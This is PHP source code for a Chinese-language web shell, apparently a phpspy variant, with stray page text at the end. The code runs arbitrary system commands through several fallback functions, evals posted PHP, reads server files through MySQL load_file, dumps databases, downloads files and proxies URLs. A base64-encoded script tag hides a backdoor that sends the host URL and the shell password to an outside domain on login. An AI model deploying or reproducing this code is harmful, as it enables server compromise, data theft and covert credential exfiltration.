error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//非安全模式可以使用上面的函数,超时取消。
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";
// 如果需要密码验证,请修改登陆密码
//默认端口表
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//跳转用的秒
$admin['jumpsecond'] = "1";
//Ftp破解用的连接端口
$alexa = "yes";
//是否显示alexa排名,yes或是no
$admin['ftpport'] = "21";
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no)
$retime = "no";
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定)
$cmd = "cmd.exe";
// 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~
/*===================== 配置结束 =====================*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "
";echo "
注销成功......三秒后自动退出或单击这里退出程序界面 >>>
";exit;}
if ($_post['do'] == 'login') {$thepass=trim($_post['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "
";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_cookie['adminpass'])) {if ($_cookie['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {$_get = stripslashes_array($_get);$_post = stripslashes_array($_post);}
//mix.dll的代码
$mixdll = "7zt/tbnngmfflrqbfnaesbmyzmccxs2k46pumo2iqjc3wsegukythv6hdaocv6ddf5aum82frbaihorlrl0y3bb/cikumnvixoie/cmmf+epxw1ixah1ylbwe+5ahma5jcsws+t5je+f9/m+z/u8z73hp9cruaxbsawhracmy4qcibeyyd8zcjbw1fcjzh/cyzqdmpytkyvvzkamnq+r5g21tixn5aotmhko4d0uxulisl8vygrr7jwhpn5martg4ozm3oz1hrypk7js2wr1/fzb2+dnzgwoszsv1lav+mfbepd5zooqjf9bvewzcmnr6ah/mmfflharjktm0jxccavbekqbme0imaogldqmiuehiz5lpga0d9bguymxdvdxy6yqskxxtgtja8kkjpuv5h8ec7f1p8ugcbsf8b9qow1n2b0lygy83sbycplcexgmnch0fjmnktryvmllj/ec3bq8v4hnauoqckmjcmpe5n15kwiciaiciaiciajyubczu2pftj1ncrgm4kqdnyaskcr+eitlke9axui/+cxt0wt+26crt4u3xc2pid9c0yb2ih2eszgh3vzld6zwhsoa3sxybmoz/t3berbdy1rx6rtxd8pdy0frswjsiytjxdm+9nwtshyn1ujy5srytnmo6nymmc9hzy64z4qmuvb5ot9ykezsvtxble12mmiv0skd7zaddnoiprg8ouiypslfxcywjnb83jklditszm0qs1rdknymsensv6ycvqsxdekjpvcucfatmyj4lc+kpltwyxvit+t7vpxt5km3clqq+snap3jgxr87yemmfxau7xjkemwl8xovrsc0ypwvfj8i7mvvzbchnjqiutdv3nviexvwcq4pq3yquzuodquc52dq1weih4avflwq2rzmgd2wqmlev5auxiszrs0n4rev87syahfmufm0ou25pgso58ljemx/neuhzku1pusinsbxf4jry4tet75y3ej5r91xngylpgno80xqhbmesa376z3+yczxxuuf8iky6gewlctlmrsgnlxaiqugovjjm+ndetbfkm4rglobr+gdvcreuocpsrcn1uuxksa9z4ueclonaseqtwex3gc42vxqnjxgkr1vto3vuod4mpreungykkqtkwjmrc4bqraeqraeqrae+s+yzcl+ephtyingl8gurfvgqprjwgabkfhhzb9r98eyno/j1mnaurgrxwy0t9osu8h975b/6f7fbubrqqpbxlndsibwjtq5ccktkmrkl4xofq2d5zhchtnyns6nihb8lwnv1tpq1lftxcrqs1e7gwwrw+7cqmh6ku1stjxxcivvpgez5zjleru/kquyg8kqu/5qu87uxtoz+k3bhptibwriolycsr2shqymiiqpthkp3gyxcnalnaos0jjc89rsl9xcuc6nfxuuf1chtbta7zzs/hrfjreeqraeqraeqrdkxyjilb62moa4anu0l5op/tgendeulgw5vkyspj6jjz+co8+201e8i+izrfryengppflbpy5q+pedhex0dy3dwkd/cfotgl8z2u6vxjbs6j+wbok611tvp9zlf9ixdneurtzyudkdj9ot9avvr2njxs6oelrqkkurafeydtv9aqjd3zacgyvb204mopq5hnq5io0pkvshujbk81ndtzsvb4dqjlcno7+wxk717qr691c9z2xlhs937eg87wsmdjvvjeagsx+ppxp81or0iudob7b81cljn1nod/0ssttcvv4+r78njim5d7d58zpmq2xhtwz0ovb1+i1nb3wbsxs6hq7h+fbiidg6pjgxeqwpd0vfb8nji2ffgwhqonfp+sjjg6bnsgdgxyboxl8thatehjsude891r1x6u8b7bsdvxkegztgr2/fdo+psoo/jg6hh1vriqskpgt+mwzpnbidpnfi2jhggxe6khmbyw7gof0cv8nxd/uva0eqbeeqbeeqbpnfqkx+d/3x9pftq+l30jvsipvmmqybfz59ix2flwtxsdvshsuwm9j32fa2k93hhmkpsjfzutbf6di2gbcah/yliaiciaiciaiciajy1/wo";
function shell($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("
",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new com("wscript.shell"))){$dir=(isset($_server["temp"]))?$_server["temp"]:ini_get('upload_tmp_dir') ;$name = $_server["temp"].name();$ws->run("cmd.exe /c $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// 查看phpinfo
if ($_get['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看
";exit;
}if($_get['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!";
echo"当前进程用户名:$user";
exit;
}
if(isset($_post['phpcode'])){eval("?".">$_post[phpcode]");exit;
}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = '数据库连接失败: ' . mysql_error();
}else{
$query="select load_file('".$filename."');";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = "读取失败,可能是文件不存在或是没file权限。
".mysql_error();
}else{
while ($row = mysql_fetch_array($result)) {
$filename = basename($filename);
if($rardown=="yes"){
$zip = new zip;
$zipfiles[]=array("$filename",$row[0]);
$zip->add($zipfiles,1);
$code = $zip->get_file();
$filename = "".$filename.".rar";
}else{
$code = $row[0];
}
header("content-type: application/octet-stream");
header("accept-ranges: bytes");
header("accept-length: ".strlen($code));
header("content-disposition: attachment;filename=$filename");
echo($code);
exit;
}
}
}
}
// 在线代理
if (isset($_post['url'])) {$proxycontents = @file_get_contents($_post['url']);echo ($proxycontents) ? $proxycontents : "
获取 url 内容失败
";exit;
}
// 下载文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."
";
}
}
mysql_close();
exit;
}
// 程序目录
$pathname=str_replace('\','/',dirname(__FILE__));
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]);
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : "";
$tb = new FORMS;
?>
402
收藏
